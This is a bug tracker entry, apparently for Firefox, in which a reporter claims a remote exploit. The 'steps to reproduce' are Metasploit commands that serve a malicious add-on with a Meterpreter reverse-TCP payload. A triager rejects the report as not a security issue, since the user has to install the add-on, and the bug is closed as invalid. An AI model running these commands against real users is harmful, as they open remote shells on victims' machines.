Created attachment 657948 [details] a.png User Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:15.0) Gecko/20100101 Firefox/15.0 Build ID: 20120824154833 Steps to reproduce: Pentesting in Backtrack 5 R3 and found a huge remote exploit in Firefox. Code: msf>use exploit/multi/browser/firefox_xpi_bootstrapped_addon msf>set payload windows/meterpreter/reverse_tcp msf>set lport 81 msf> set lhost 0.0.0.0 msf> set srvhost yourip msf> show targets Id Name -- ---- 0 Generic (Java Payload) 1 Windows x86 (Native Payload) 2 Linux x86 (Native Payload) 3 Mac OS X PPC (Native Payload) 4 Mac OS X x86 (Native Payload) msf> set target 1 msf > exploit Actual results: I was able to gain remote access to a PC, and was able to install malicious software if it was for malicious intentions. Expected results: The exploit shouldn't have existed in the first place.
this is not security sensitive this is a module that creates a malicious xpi that is an attempt to get the user to install a crafted add-on since add-ons can have chrome privileges they can do just about anything
Status: UNCONFIRMED → RESOLVED
Last Resolved: 6 years ago
Resolution: --- → INVALID
You need to log in before you can comment on or make changes to this bug.